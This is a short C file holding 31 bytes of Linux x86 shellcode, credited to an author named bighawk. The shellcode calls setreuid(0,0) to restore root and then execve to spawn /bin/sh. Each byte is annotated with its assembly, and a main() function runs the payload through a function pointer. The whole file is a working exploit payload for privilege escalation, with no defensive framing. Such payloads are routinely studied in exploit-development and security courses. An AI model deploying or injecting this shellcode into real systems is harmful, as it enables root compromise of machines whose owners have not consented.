/* 31 bytes setreuid(0, 0) execve /bin/sh shellcode - linux-x86
 * - by bighawk (bighawk@warfare.com)
 *
 */

char code[] =

   "\x31\xdb"           	// xor     ebx, ebx
   "\x31\xc9"           	// xor     ecx, ecx
   "\xf7\xe3"           	// mul     ebx
   "\xb0\x46"			// mov     al, 70
   "\xcd\x80"			// int     80h
   "\x53"			// push    ebx
   "\x68\x6e\x2f\x73\x68"	// push    dword 68732f6eh
   "\x68\x2f\x2f\x62\x69"	// push    dword 69622f2fh
   "\x89\xe3"			// mov     ebx, esp
   "\x52"			// push    edx
   "\x53"			// push    ebx
   "\x89\xe1"			// mov     ecx, esp
   "\xb0\x0b"			// mov     al, 11
   "\xcd\x80";			// int     80h

main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", strlen(code));
  a();
}